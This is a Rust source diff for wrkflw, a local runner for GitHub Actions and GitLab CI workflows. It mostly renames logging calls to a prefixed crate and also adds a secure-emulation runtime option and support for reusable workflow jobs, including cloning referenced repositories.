wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
None
}
}
@@ -134,7 +134,7 @@ impl DockerRuntime {
if let Err(e) = CUSTOMIZED_IMAGES.lock().map(|mut images| {
images.insert(key, new_image.to_string());
}) {
logging::error(&format!("Failed to acquire lock: {}", e));
wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
}
}
@@ -318,7 +318,7 @@ pub fn is_available() -> bool {
}
}
Err(_) => {
logging::debug("Docker CLI is not available");
wrkflw_logging::debug("Docker CLI is not available");
return false;
}
}
@@ -331,7 +331,7 @@ pub fn is_available() -> bool {
{
Ok(rt) => rt,
Err(e) => {
logging::error(&format!(
wrkflw_logging::error(&format!(
"Failed to create runtime for Docker availability check: {}",
e
));
@@ -352,17 +352,25 @@ pub fn is_available() -> bool {
{
Ok(Ok(_)) => true,
Ok(Err(e)) => {
logging::debug(&format!("Docker daemon ping failed: {}", e));
wrkflw_logging::debug(&format!(
"Docker daemon ping failed: {}",
e
));
false
}
Err(_) => {
logging::debug("Docker daemon ping timed out after 1 second");
wrkflw_logging::debug(
"Docker daemon ping timed out after 1 second",
);
false
}
}
}
Err(e) => {
logging::debug(&format!("Docker daemon connection failed: {}", e));
wrkflw_logging::debug(&format!(
"Docker daemon connection failed: {}",
e
));
false
}
}
@@ -371,7 +379,7 @@ pub fn is_available() -> bool {
{
Ok(result) => result,
Err(_) => {
logging::debug("Docker availability check timed out");
wrkflw_logging::debug("Docker availability check timed out");
false
}
}
@@ -379,7 +387,9 @@ pub fn is_available() -> bool {
}) {
Ok(result) => result,
Err(_) => {
logging::debug("Failed to redirect stderr when checking Docker availability");
wrkflw_logging::debug(
"Failed to redirect stderr when checking Docker availability",
);
false
}
}
@@ -393,7 +403,7 @@ pub fn is_available() -> bool {
return match handle.join() {
Ok(result) => result,
Err(_) => {
logging::warning("Docker availability check thread panicked");
wrkflw_logging::warning("Docker availability check thread panicked");
false
}
};
@@ -401,7 +411,9 @@ pub fn is_available() -> bool {
std::thread::sleep(std::time::Duration::from_millis(50));
}
logging::warning("Docker availability check timed out, assuming Docker is not available");
wrkflw_logging::warning(
"Docker availability check timed out, assuming Docker is not available",
);
false
}
@@ -444,19 +456,19 @@ pub async fn cleanup_resources(docker: &Docker) {
tokio::join!(cleanup_containers(docker), cleanup_networks(docker));
if let Err(e) = container_result {
logging::error(&format!("Error during container cleanup: {}", e));
wrkflw_logging::error(&format!("Error during container cleanup: {}", e));
}
if let Err(e) = network_result {
logging::error(&format!("Error during network cleanup: {}", e));
wrkflw_logging::error(&format!("Error during network cleanup: {}", e));
}
})
.await
{
Ok(_) => logging::debug("Docker cleanup completed within timeout"),
Err(_) => {
logging::warning("Docker cleanup timed out, some resources may not have been removed")
}
Ok(_) => wrkflw_logging::debug("Docker cleanup completed within timeout"),
Err(_) => wrkflw_logging::warning(
"Docker cleanup timed out, some resources may not have been removed",
),
}
}
@@ -468,7 +480,7 @@ pub async fn cleanup_containers(docker: &Docker) -> Result<(), String> {
match RUNNING_CONTAINERS.try_lock() {
Ok(containers) => containers.clone(),
Err(_) => {
logging::error("Could not acquire container lock for cleanup");
wrkflw_logging::error("Could not acquire container lock for cleanup");
vec![]
}
}
@@ -477,7 +489,7 @@ pub async fn cleanup_containers(docker: &Docker) -> Result<(), String> {
{
Ok(containers) => containers,
Err(_) => {
logging::error("Timeout while trying to get containers for cleanup");
wrkflw_logging::error("Timeout while trying to get containers for cleanup");
vec![]
}
};
@@ -486,7 +498,7 @@ pub async fn cleanup_containers(docker: &Docker) -> Result<(), String> {
return Ok(());
}
logging::info(&format!(
wrkflw_logging::info(&format!(
"Cleaning up {} containers",
containers_to_cleanup.len()
));
@@ -500,11 +512,14 @@ pub async fn cleanup_containers(docker: &Docker) -> Result<(), String> {
)
.await
{
Ok(Ok(_)) => logging::debug(&format!("Stopped container: {}", container_id)),
Ok(Err(e)) => {
logging::warning(&format!("Error stopping container {}: {}", container_id, e))
Ok(Ok(_)) => wrkflw_logging::debug(&format!("Stopped container: {}", container_id)),
Ok(Err(e)) => wrkflw_logging::warning(&format!(
"Error stopping container {}: {}",
container_id, e
)),
Err(_) => {
wrkflw_logging::warning(&format!("Timeout stopping container: {}", container_id))
}
Err(_) => logging::warning(&format!("Timeout stopping container: {}", container_id)),
}
// Then try to remove it
@@ -514,11 +529,14 @@ pub async fn cleanup_containers(docker: &Docker) -> Result<(), String> {
)
.await
{
Ok(Ok(_)) => logging::debug(&format!("Removed container: {}", container_id)),
Ok(Err(e)) => {
logging::warning(&format!("Error removing container {}: {}", container_id, e))
Ok(Ok(_)) => wrkflw_logging::debug(&format!("Removed container: {}", container_id)),
Ok(Err(e)) => wrkflw_logging::warning(&format!(
"Error removing container {}: {}",
container_id, e
)),
Err(_) => {
wrkflw_logging::warning(&format!("Timeout removing container: {}", container_id))
}
Err(_) => logging::warning(&format!("Timeout removing container: {}", container_id)),
}
// Always untrack the container whether or not we succeeded to avoid future cleanup attempts
@@ -536,7 +554,7 @@ pub async fn cleanup_networks(docker: &Docker) -> Result<(), String> {
match CREATED_NETWORKS.try_lock() {
Ok(networks) => networks.clone(),
Err(_) => {
logging::error("Could not acquire network lock for cleanup");
wrkflw_logging::error("Could not acquire network lock for cleanup");
vec![]
}
}
@@ -545,7 +563,7 @@ pub async fn cleanup_networks(docker: &Docker) -> Result<(), String> {
{
Ok(networks) => networks,
Err(_) => {
logging::error("Timeout while trying to get networks for cleanup");
wrkflw_logging::error("Timeout while trying to get networks for cleanup");
vec![]
}
};
@@ -554,7 +572,7 @@ pub async fn cleanup_networks(docker: &Docker) -> Result<(), String> {
return Ok(());
}
logging::info(&format!(
wrkflw_logging::info(&format!(
"Cleaning up {} networks",
networks_to_cleanup.len()
));
@@ -566,9 +584,13 @@ pub async fn cleanup_networks(docker: &Docker) -> Result<(), String> {
)
.await
{
Ok(Ok(_)) => logging::info(&format!("Successfully removed network: {}", network_id)),
Ok(Err(e)) => logging::error(&format!("Error removing network {}: {}", network_id, e)),
Err(_) => logging::warning(&format!("Timeout removing network: {}", network_id)),
Ok(Ok(_)) => {
wrkflw_logging::info(&format!("Successfully removed network: {}", network_id))
}
Ok(Err(e)) => {
wrkflw_logging::error(&format!("Error removing network {}: {}", network_id, e))
}
Err(_) => wrkflw_logging::warning(&format!("Timeout removing network: {}", network_id)),
}
// Always untrack the network whether or not we succeeded
@@ -599,7 +621,7 @@ pub async fn create_job_network(docker: &Docker) -> Result<String, ContainerErro
})?;
track_network(&network_id);
logging::info(&format!("Created Docker network: {}", network_id));
wrkflw_logging::info(&format!("Created Docker network: {}", network_id));
Ok(network_id)
}
@@ -615,7 +637,7 @@ impl ContainerRuntime for DockerRuntime {
volumes: &[(&Path, &Path)],
) -> Result<ContainerOutput, ContainerError> {
// Print detailed debugging info
logging::info(&format!("Docker: Running container with image: {}", image));
wrkflw_logging::info(&format!("Docker: Running container with image: {}", image));
// Add a global timeout for all Docker operations to prevent freezing
let timeout_duration = std::time::Duration::from_secs(360); // Increased outer timeout to 6 minutes
@@ -629,7 +651,7 @@ impl ContainerRuntime for DockerRuntime {
{
Ok(result) => result,
Err(_) => {
logging::error("Docker operation timed out after 360 seconds");
wrkflw_logging::error("Docker operation timed out after 360 seconds");
Err(ContainerError::ContainerExecution(
"Operation timed out".to_string(),
))
@@ -644,7 +666,7 @@ impl ContainerRuntime for DockerRuntime {
match tokio::time::timeout(timeout_duration, self.pull_image_inner(image)).await {
Ok(result) => result,
Err(_) => {
logging::warning(&format!(
wrkflw_logging::warning(&format!(
"Pull of image {} timed out, continuing with existing image",
image
));
@@ -662,7 +684,7 @@ impl ContainerRuntime for DockerRuntime {
{
Ok(result) => result,
Err(_) => {
logging::error(&format!(
wrkflw_logging::error(&format!(
"Building image {} timed out after 120 seconds",
tag
));
@@ -836,9 +858,9 @@ impl DockerRuntime {
// Convert command vector to Vec<String>
let cmd_vec: Vec<String> = cmd.iter().map(|&s| s.to_string()).collect();
logging::debug(&format!("Running command in Docker: {:?}", cmd_vec));
logging::debug(&format!("Environment: {:?}", env));
logging::debug(&format!("Working directory: {}", working_dir.display()));
wrkflw_logging::debug(&format!("Running command in Docker: {:?}", cmd_vec));
wrkflw_logging::debug(&format!("Environment: {:?}", env));
wrkflw_logging::debug(&format!("Working directory: {}", working_dir.display()));
// Determine platform-specific configurations
let is_windows_image = image.contains("windows")
@@ -973,7 +995,7 @@ impl DockerRuntime {
_ => -1,
},
Err(_) => {
logging::warning("Container wait operation timed out, treating as failure");
wrkflw_logging::warning("Container wait operation timed out, treating as failure");
-1
}
};
@@ -1003,7 +1025,7 @@ impl DockerRuntime {
}
}
} else {
logging::warning("Retrieving container logs timed out");
wrkflw_logging::warning("Retrieving container logs timed out");
}
// Clean up container with a timeout, but preserve on failure if configured
@@ -1016,7 +1038,7 @@ impl DockerRuntime {
untrack_container(&container.id);
} else {
// Container failed and we want to preserve it for debugging
logging::info(&format!(
wrkflw_logging::info(&format!(
"Preserving container {} for debugging (exit code: {}). Use 'docker exec -it {} bash' to inspect.",
container.id, exit_code, container.id
));
@@ -1026,13 +1048,13 @@ impl DockerRuntime {
// Log detailed information about the command execution for debugging
if exit_code != 0 {
logging::info(&format!(
wrkflw_logging::info(&format!(
"Docker command failed with exit code: {}",
exit_code
));
logging::debug(&format!("Failed command: {:?}", cmd));
logging::debug(&format!("Working directory: {}", working_dir.display()));
logging::debug(&format!("STDERR: {}", stderr));
wrkflw_logging::debug(&format!("Failed command: {:?}", cmd));
wrkflw_logging::debug(&format!("Working directory: {}", working_dir.display()));
wrkflw_logging::debug(&format!("STDERR: {}", stderr));
}
Ok(ContainerOutput {

View File

@@ -13,13 +13,13 @@ use crate::dependency;
use crate::docker;
use crate::environment;
use crate::podman;
use logging;
use matrix::MatrixCombination;
use models::gitlab::Pipeline;
use parser::gitlab::{self, parse_pipeline};
use parser::workflow::{self, parse_workflow, ActionInfo, Job, WorkflowDefinition};
use runtime::container::ContainerRuntime;
use runtime::emulation;
use wrkflw_logging;
use wrkflw_matrix::MatrixCombination;
use wrkflw_models::gitlab::Pipeline;
use wrkflw_parser::gitlab::{self, parse_pipeline};
use wrkflw_parser::workflow::{self, parse_workflow, ActionInfo, Job, WorkflowDefinition};
use wrkflw_runtime::container::ContainerRuntime;
use wrkflw_runtime::emulation;
#[allow(unused_variables, unused_assignments)]
/// Execute a GitHub Actions workflow file locally
@@ -27,8 +27,8 @@ pub async fn execute_workflow(
workflow_path: &Path,
config: ExecutionConfig,
) -> Result<ExecutionResult, ExecutionError> {
logging::info(&format!("Executing workflow: {}", workflow_path.display()));
logging::info(&format!("Runtime: {:?}", config.runtime_type));
wrkflw_logging::info(&format!("Executing workflow: {}", workflow_path.display()));
wrkflw_logging::info(&format!("Runtime: {:?}", config.runtime_type));
// Determine if this is a GitLab CI/CD pipeline or GitHub Actions workflow
let is_gitlab = is_gitlab_pipeline(workflow_path);
@@ -98,6 +98,7 @@ async fn execute_github_workflow(
"WRKFLW_RUNTIME_MODE".to_string(),
match config.runtime_type {
RuntimeType::Emulation => "emulation".to_string(),
RuntimeType::SecureEmulation => "secure_emulation".to_string(),
RuntimeType::Docker => "docker".to_string(),
RuntimeType::Podman => "podman".to_string(),
},
@@ -150,7 +151,7 @@ async fn execute_github_workflow(
// If there were failures, add detailed failure information to the result
if has_failures {
logging::error(&format!("Workflow execution failed:{}", failure_details));
wrkflw_logging::error(&format!("Workflow execution failed:{}", failure_details));
}
Ok(ExecutionResult {
@@ -168,7 +169,7 @@ async fn execute_gitlab_pipeline(
pipeline_path: &Path,
config: ExecutionConfig,
) -> Result<ExecutionResult, ExecutionError> {
logging::info("Executing GitLab CI/CD pipeline");
wrkflw_logging::info("Executing GitLab CI/CD pipeline");
// 1. Parse the GitLab pipeline file
let pipeline = parse_pipeline(pipeline_path)
@@ -198,6 +199,7 @@ async fn execute_gitlab_pipeline(
"WRKFLW_RUNTIME_MODE".to_string(),
match config.runtime_type {
RuntimeType::Emulation => "emulation".to_string(),
RuntimeType::SecureEmulation => "secure_emulation".to_string(),
RuntimeType::Docker => "docker".to_string(),
RuntimeType::Podman => "podman".to_string(),
},
@@ -244,7 +246,7 @@ async fn execute_gitlab_pipeline(
// If there were failures, add detailed failure information to the result
if has_failures {
logging::error(&format!("Pipeline execution failed:{}", failure_details));
wrkflw_logging::error(&format!("Pipeline execution failed:{}", failure_details));
}
Ok(ExecutionResult {
@@ -369,7 +371,7 @@ fn initialize_runtime(
match docker::DockerRuntime::new_with_config(preserve_containers_on_failure) {
Ok(docker_runtime) => Ok(Box::new(docker_runtime)),
Err(e) => {
logging::error(&format!(
wrkflw_logging::error(&format!(
"Failed to initialize Docker runtime: {}, falling back to emulation mode",
e
));
@@ -377,7 +379,7 @@ fn initialize_runtime(
}
}
} else {
logging::error("Docker not available, falling back to emulation mode");
wrkflw_logging::error("Docker not available, falling back to emulation mode");
Ok(Box::new(emulation::EmulationRuntime::new()))
}
}
@@ -387,7 +389,7 @@ fn initialize_runtime(
match podman::PodmanRuntime::new_with_config(preserve_containers_on_failure) {
Ok(podman_runtime) => Ok(Box::new(podman_runtime)),
Err(e) => {
logging::error(&format!(
wrkflw_logging::error(&format!(
"Failed to initialize Podman runtime: {}, falling back to emulation mode",
e
));
@@ -395,11 +397,14 @@ fn initialize_runtime(
}
}
} else {
logging::error("Podman not available, falling back to emulation mode");
wrkflw_logging::error("Podman not available, falling back to emulation mode");
Ok(Box::new(emulation::EmulationRuntime::new()))
}
}
RuntimeType::Emulation => Ok(Box::new(emulation::EmulationRuntime::new())),
RuntimeType::SecureEmulation => Ok(Box::new(
wrkflw_runtime::secure_emulation::SecureEmulationRuntime::new(),
)),
}
}
@@ -408,6 +413,7 @@ pub enum RuntimeType {
Docker,
Podman,
Emulation,
SecureEmulation,
}
#[derive(Debug, Clone)]
@@ -577,7 +583,7 @@ async fn execute_job_with_matrix(
if let Some(if_condition) = &job.if_condition {
let should_run = evaluate_job_condition(if_condition, env_context, workflow);
if !should_run {
logging::info(&format!(
wrkflw_logging::info(&format!(
"⏭️ Skipping job '{}' due to condition: {}",
job_name, if_condition
));
@@ -594,11 +600,11 @@ async fn execute_job_with_matrix(
// Check if this is a matrix job
if let Some(matrix_config) = &job.matrix {
// Expand the matrix into combinations
let combinations = matrix::expand_matrix(matrix_config)
let combinations = wrkflw_matrix::expand_matrix(matrix_config)
.map_err(|e| ExecutionError::Execution(format!("Failed to expand matrix: {}", e)))?;
if combinations.is_empty() {
logging::info(&format!(
wrkflw_logging::info(&format!(
"Matrix job '{}' has no valid combinations",
job_name
));
@@ -606,7 +612,7 @@ async fn execute_job_with_matrix(
return Ok(Vec::new());
}
logging::info(&format!(
wrkflw_logging::info(&format!(
"Matrix job '{}' expanded to {} combinations",
job_name,
combinations.len()
@@ -652,6 +658,12 @@ async fn execute_job(ctx: JobExecutionContext<'_>) -> Result<JobResult, Executio
ExecutionError::Execution(format!("Job '{}' not found in workflow", ctx.job_name))
})?;
// Handle reusable workflow jobs (job-level 'uses')
if let Some(uses) = &job.uses {
return execute_reusable_workflow_job(&ctx, uses, job.with.as_ref(), job.secrets.as_ref())
.await;
}
// Clone context and add job-specific variables
let mut job_env = ctx.env_context.clone();
@@ -674,17 +686,20 @@ async fn execute_job(ctx: JobExecutionContext<'_>) -> Result<JobResult, Executio
})?;
// Copy project files to the job workspace directory
logging::info(&format!(
wrkflw_logging::info(&format!(
"Copying project files to job workspace: {}",
job_dir.path().display()
));
copy_directory_contents(&current_dir, job_dir.path())?;
logging::info(&format!("Executing job: {}", ctx.job_name));
wrkflw_logging::info(&format!("Executing job: {}", ctx.job_name));
let mut job_success = true;
// Execute job steps
// Determine runner image (default if not provided)
let runner_image_value = get_runner_image_from_opt(&job.runs_on);
for (idx, step) in job.steps.iter().enumerate() {
let step_result = execute_step(StepExecutionContext {
step,
@@ -693,7 +708,7 @@ async fn execute_job(ctx: JobExecutionContext<'_>) -> Result<JobResult, Executio
working_dir: job_dir.path(),
runtime: ctx.runtime,
workflow: ctx.workflow,
runner_image: &get_runner_image(&job.runs_on),
runner_image: &runner_image_value,
verbose: ctx.verbose,
matrix_combination: &None,
})
@@ -780,7 +795,8 @@ async fn execute_matrix_combinations(
if ctx.fail_fast && any_failed {
// Add skipped results for remaining combinations
for combination in chunk {
let combination_name = matrix::format_combination_name(ctx.job_name, combination);
let combination_name =
wrkflw_matrix::format_combination_name(ctx.job_name, combination);
results.push(JobResult {
name: combination_name,
status: JobStatus::Skipped,
@@ -818,7 +834,7 @@ async fn execute_matrix_combinations(
Err(e) => {
// On error, mark as failed and continue if not fail-fast
any_failed = true;
logging::error(&format!("Matrix job failed: {}", e));
wrkflw_logging::error(&format!("Matrix job failed: {}", e));
if ctx.fail_fast {
return Err(e);
@@ -842,9 +858,9 @@ async fn execute_matrix_job(
verbose: bool,
) -> Result<JobResult, ExecutionError> {
// Create the matrix-specific job name
let matrix_job_name = matrix::format_combination_name(job_name, combination);
let matrix_job_name = wrkflw_matrix::format_combination_name(job_name, combination);
logging::info(&format!("Executing matrix job: {}", matrix_job_name));
wrkflw_logging::info(&format!("Executing matrix job: {}", matrix_job_name));
// Clone the environment and add matrix-specific values
let mut job_env = base_env_context.clone();
@@ -870,17 +886,20 @@ async fn execute_matrix_job(
})?;
// Copy project files to the job workspace directory
logging::info(&format!(
wrkflw_logging::info(&format!(
"Copying project files to job workspace: {}",
job_dir.path().display()
));
copy_directory_contents(&current_dir, job_dir.path())?;
let job_success = if job_template.steps.is_empty() {
logging::warning(&format!("Job '{}' has no steps", matrix_job_name));
wrkflw_logging::warning(&format!("Job '{}' has no steps", matrix_job_name));
true
} else {
// Execute each step
// Determine runner image (default if not provided)
let runner_image_value = get_runner_image_from_opt(&job_template.runs_on);
for (idx, step) in job_template.steps.iter().enumerate() {
match execute_step(StepExecutionContext {
step,
@@ -889,7 +908,7 @@ async fn execute_matrix_job(
working_dir: job_dir.path(),
runtime,
workflow,
runner_image: &get_runner_image(&job_template.runs_on),
runner_image: &runner_image_value,
verbose,
matrix_combination: &Some(combination.values.clone()),
})
@@ -971,7 +990,7 @@ async fn execute_step(ctx: StepExecutionContext<'_>) -> Result<StepResult, Execu
.unwrap_or_else(|| format!("Step {}", ctx.step_idx + 1));
if ctx.verbose {
logging::info(&format!(" Executing step: {}", step_name));
wrkflw_logging::info(&format!(" Executing step: {}", step_name));
}
// Prepare step environment
@@ -1073,7 +1092,9 @@ async fn execute_step(ctx: StepExecutionContext<'_>) -> Result<StepResult, Execu
// Special handling for Rust actions
if uses.starts_with("actions-rs/") {
logging::info("🔄 Detected Rust action - using system Rust installation");
wrkflw_logging::info(
"🔄 Detected Rust action - using system Rust installation",
);
// For toolchain action, verify Rust is installed
if uses.starts_with("actions-rs/toolchain@") {
@@ -1083,7 +1104,10 @@ async fn execute_step(ctx: StepExecutionContext<'_>) -> Result<StepResult, Execu
.map(|output| String::from_utf8_lossy(&output.stdout).to_string())
.unwrap_or_else(|_| "not found".to_string());
logging::info(&format!("🔄 Using system Rust: {}", rustc_version.trim()));
wrkflw_logging::info(&format!(
"🔄 Using system Rust: {}",
rustc_version.trim()
));
// Return success since we're using system Rust
return Ok(StepResult {
@@ -1101,7 +1125,7 @@ async fn execute_step(ctx: StepExecutionContext<'_>) -> Result<StepResult, Execu
.map(|output| String::from_utf8_lossy(&output.stdout).to_string())
.unwrap_or_else(|_| "not found".to_string());
logging::info(&format!(
wrkflw_logging::info(&format!(
"🔄 Using system Rust/Cargo: {}",
cargo_version.trim()
));
@@ -1109,7 +1133,10 @@ async fn execute_step(ctx: StepExecutionContext<'_>) -> Result<StepResult, Execu
// Get the command from the 'with' parameters
if let Some(with_params) = &ctx.step.with {
if let Some(command) = with_params.get("command") {
logging::info(&format!("🔄 Found command parameter: {}", command));
wrkflw_logging::info(&format!(
"🔄 Found command parameter: {}",
command
));
// Build the actual command
let mut real_command = format!("cargo {}", command);
@@ -1119,7 +1146,7 @@ async fn execute_step(ctx: StepExecutionContext<'_>) -> Result<StepResult, Execu
if !args.is_empty() {
// Resolve GitHub-style variables in args
let resolved_args = if args.contains("${{") {
logging::info(&format!(
wrkflw_logging::info(&format!(
"🔄 Resolving workflow variables in: {}",
args
));
@@ -1133,7 +1160,7 @@ async fn execute_step(ctx: StepExecutionContext<'_>) -> Result<StepResult, Execu
let re_pattern =
regex::Regex::new(r"\$\{\{\s*([^}]+)\s*\}\}")
.unwrap_or_else(|_| {
logging::error(
wrkflw_logging::error(
"Failed to create regex pattern",
);
regex::Regex::new(r"\$\{\{.*?\}\}").unwrap()
@@ -1141,7 +1168,10 @@ async fn execute_step(ctx: StepExecutionContext<'_>) -> Result<StepResult, Execu
let resolved =
re_pattern.replace_all(&resolved, "").to_string();
logging::info(&format!("🔄 Resolved to: {}", resolved));
wrkflw_logging::info(&format!(
"🔄 Resolved to: {}",
resolved
));
resolved.trim().to_string()
} else {
@@ -1157,7 +1187,7 @@ async fn execute_step(ctx: StepExecutionContext<'_>) -> Result<StepResult, Execu
}
}
logging::info(&format!(
wrkflw_logging::info(&format!(
"🔄 Running actual command: {}",
real_command
));
@@ -1239,13 +1269,13 @@ async fn execute_step(ctx: StepExecutionContext<'_>) -> Result<StepResult, Execu
.cloned()
.unwrap_or_else(|| "not set".to_string());
logging::debug(&format!(
wrkflw_logging::debug(&format!(
"WRKFLW_HIDE_ACTION_MESSAGES value: {}",
hide_action_value
));
let hide_messages = hide_action_value == "true";
logging::debug(&format!("Should hide messages: {}", hide_messages));
wrkflw_logging::debug(&format!("Should hide messages: {}", hide_messages));
// Only log a message to the console if we're showing action messages
if !hide_messages {
@@ -1262,7 +1292,10 @@ async fn execute_step(ctx: StepExecutionContext<'_>) -> Result<StepResult, Execu
// Common GitHub action pattern: has a 'command' parameter
if let Some(cmd) = with_params.get("command") {
if ctx.verbose {
logging::info(&format!("🔄 Found command parameter: {}", cmd));
wrkflw_logging::info(&format!(
"🔄 Found command parameter: {}",
cmd
));
}
// Convert to real command based on action type patterns
@@ -1302,7 +1335,7 @@ async fn execute_step(ctx: StepExecutionContext<'_>) -> Result<StepResult, Execu
if !args.is_empty() {
// Resolve GitHub-style variables in args
let resolved_args = if args.contains("${{") {
logging::info(&format!(
wrkflw_logging::info(&format!(
"🔄 Resolving workflow variables in: {}",
args
));
@@ -1315,7 +1348,7 @@ async fn execute_step(ctx: StepExecutionContext<'_>) -> Result<StepResult, Execu
let re_pattern =
regex::Regex::new(r"\$\{\{\s*([^}]+)\s*\}\}")
.unwrap_or_else(|_| {
logging::error(
wrkflw_logging::error(
"Failed to create regex pattern",
);
regex::Regex::new(r"\$\{\{.*?\}\}").unwrap()
@@ -1323,7 +1356,10 @@ async fn execute_step(ctx: StepExecutionContext<'_>) -> Result<StepResult, Execu
let resolved =
re_pattern.replace_all(&resolved, "").to_string();
logging::info(&format!("🔄 Resolved to: {}", resolved));
wrkflw_logging::info(&format!(
"🔄 Resolved to: {}",
resolved
));
resolved.trim().to_string()
} else {
@@ -1342,7 +1378,10 @@ async fn execute_step(ctx: StepExecutionContext<'_>) -> Result<StepResult, Execu
if should_run_real_command && !real_command_parts.is_empty() {
// Build a final command string
let command_str = real_command_parts.join(" ");
logging::info(&format!("🔄 Running actual command: {}", command_str));
wrkflw_logging::info(&format!(
"🔄 Running actual command: {}",
command_str
));
// Replace the emulated command with a shell command to execute our command
cmd.clear();
@@ -1729,6 +1768,189 @@ fn get_runner_image(runs_on: &str) -> String {
.to_string()
}
fn get_runner_image_from_opt(runs_on: &Option<Vec<String>>) -> String {
let default = "ubuntu-latest";
let ro = runs_on
.as_ref()
.and_then(|vec| vec.first())
.map(|s| s.as_str())
.unwrap_or(default);
get_runner_image(ro)
}
async fn execute_reusable_workflow_job(
ctx: &JobExecutionContext<'_>,
uses: &str,
with: Option<&HashMap<String, String>>,
secrets: Option<&serde_yaml::Value>,
) -> Result<JobResult, ExecutionError> {
wrkflw_logging::info(&format!(
"Executing reusable workflow job '{}' -> {}",
ctx.job_name, uses
));
// Resolve the called workflow file path
enum UsesRef<'a> {
LocalPath(&'a str),
Remote {
owner: String,
repo: String,
path: String,
r#ref: String,
},
}
let uses_ref = if uses.starts_with("./") || uses.starts_with('/') {
UsesRef::LocalPath(uses)
} else {
// Expect format owner/repo/path/to/workflow.yml@ref
let parts: Vec<&str> = uses.split('@').collect();
if parts.len() != 2 {
return Err(ExecutionError::Execution(format!(
"Invalid reusable workflow reference: {}",
uses
)));
}
let left = parts[0];
let r#ref = parts[1].to_string();
let mut segs = left.splitn(3, '/');
let owner = segs.next().unwrap_or("").to_string();
let repo = segs.next().unwrap_or("").to_string();
let path = segs.next().unwrap_or("").to_string();
if owner.is_empty() || repo.is_empty() || path.is_empty() {
return Err(ExecutionError::Execution(format!(
"Invalid reusable workflow reference: {}",
uses
)));
}
UsesRef::Remote {
owner,
repo,
path,
r#ref,
}
};
// Load workflow file
let workflow_path = match uses_ref {
UsesRef::LocalPath(p) => {
// Resolve relative to current directory
let current_dir = std::env::current_dir().map_err(|e| {
ExecutionError::Execution(format!("Failed to get current dir: {}", e))
})?;
let path = current_dir.join(p);
if !path.exists() {
return Err(ExecutionError::Execution(format!(
"Reusable workflow not found at path: {}",
path.display()
)));
}
path
}
UsesRef::Remote {
owner,
repo,
path,
r#ref,
} => {
// Clone minimal repository and checkout ref
let tempdir = tempfile::tempdir().map_err(|e| {
ExecutionError::Execution(format!("Failed to create temp dir: {}", e))
})?;
let repo_url = format!("https://github.com/{}/{}.git", owner, repo);
// git clone
let status = Command::new("git")
.arg("clone")
.arg("--depth")
.arg("1")
.arg("--branch")
.arg(&r#ref)
.arg(&repo_url)
.arg(tempdir.path())
.status()
.map_err(|e| ExecutionError::Execution(format!("Failed to execute git: {}", e)))?;
if !status.success() {
return Err(ExecutionError::Execution(format!(
"Failed to clone {}@{}",
repo_url, r#ref
)));
}
let joined = tempdir.path().join(path);
if !joined.exists() {
return Err(ExecutionError::Execution(format!(
"Reusable workflow file not found in repo: {}",
joined.display()
)));
}
joined
}
};
// Parse called workflow
let called = parse_workflow(&workflow_path)?;
// Create child env context
let mut child_env = ctx.env_context.clone();
if let Some(with_map) = with {
for (k, v) in with_map {
child_env.insert(format!("INPUT_{}", k.to_uppercase()), v.clone());
}
}
if let Some(secrets_val) = secrets {
if let Some(map) = secrets_val.as_mapping() {
for (k, v) in map {
if let (Some(key), Some(value)) = (k.as_str(), v.as_str()) {
child_env.insert(format!("SECRET_{}", key.to_uppercase()), value.to_string());
}
}
}
}
// Execute called workflow
let plan = dependency::resolve_dependencies(&called)?;
let mut all_results = Vec::new();
let mut any_failed = false;
for batch in plan {
let results =
execute_job_batch(&batch, &called, ctx.runtime, &child_env, ctx.verbose).await?;
for r in &results {
if r.status == JobStatus::Failure {
any_failed = true;
}
}
all_results.extend(results);
}
// Summarize into a single JobResult
let mut logs = String::new();
logs.push_str(&format!("Called workflow: {}\n", workflow_path.display()));
for r in &all_results {
logs.push_str(&format!("- {}: {:?}\n", r.name, r.status));
}
// Represent as one summary step for UI
let summary_step = StepResult {
name: format!("Run reusable workflow: {}", uses),
status: if any_failed {
StepStatus::Failure
} else {
StepStatus::Success
},
output: logs.clone(),
};
Ok(JobResult {
name: ctx.job_name.to_string(),
status: if any_failed {
JobStatus::Failure
} else {
JobStatus::Success
},
steps: vec![summary_step],
logs,
})
}
#[allow(dead_code)]
async fn prepare_runner_image(
image: &str,
@@ -1737,7 +1959,7 @@ async fn prepare_runner_image(
) -> Result<(), ExecutionError> {
// Try to pull the image first
if let Err(e) = runtime.pull_image(image).await {
logging::warning(&format!("Failed to pull image {}: {}", image, e));
wrkflw_logging::warning(&format!("Failed to pull image {}: {}", image, e));
}
// Check if this is a language-specific runner
@@ -1750,7 +1972,7 @@ async fn prepare_runner_image(
.map_err(|e| ExecutionError::Runtime(e.to_string()))
{
if verbose {
logging::info(&format!("Using customized image: {}", custom_image));
wrkflw_logging::info(&format!("Using customized image: {}", custom_image));
}
return Ok(());
}
@@ -2028,7 +2250,7 @@ fn evaluate_job_condition(
env_context: &HashMap<String, String>,
workflow: &WorkflowDefinition,
) -> bool {
logging::debug(&format!("Evaluating condition: {}", condition));
wrkflw_logging::debug(&format!("Evaluating condition: {}", condition));
// For now, implement basic pattern matching for common conditions
// TODO: Implement a full GitHub Actions expression evaluator
@@ -2051,14 +2273,14 @@ fn evaluate_job_condition(
if condition.contains("needs.") && condition.contains(".outputs.") {
// For now, simulate that outputs are available but empty
// This means conditions like needs.changes.outputs.source-code == 'true' will be false
logging::debug(
wrkflw_logging::debug(
"Evaluating needs.outputs condition - defaulting to false for local execution",
);
return false;
}
// Default to true for unknown conditions to avoid breaking workflows
logging::warning(&format!(
wrkflw_logging::warning(&format!(
"Unknown condition pattern: '{}' - defaulting to true",
condition
));

View File

@@ -1,8 +1,8 @@
use chrono::Utc;
use matrix::MatrixCombination;
use parser::workflow::WorkflowDefinition;
use serde_yaml::Value;
use std::{collections::HashMap, fs, io, path::Path};
use wrkflw_matrix::MatrixCombination;
use wrkflw_parser::workflow::WorkflowDefinition;
pub fn setup_github_environment_files(workspace_dir: &Path) -> io::Result<()> {
// Create necessary directories

View File

@@ -1,15 +1,15 @@
use async_trait::async_trait;
use logging;
use once_cell::sync::Lazy;
use runtime::container::{ContainerError, ContainerOutput, ContainerRuntime};
use std::collections::HashMap;
use std::path::Path;
use std::process::Stdio;
use std::sync::Mutex;
use tempfile;
use tokio::process::Command;
use utils;
use utils::fd;
use wrkflw_logging;
use wrkflw_runtime::container::{ContainerError, ContainerOutput, ContainerRuntime};
use wrkflw_utils;
use wrkflw_utils::fd;
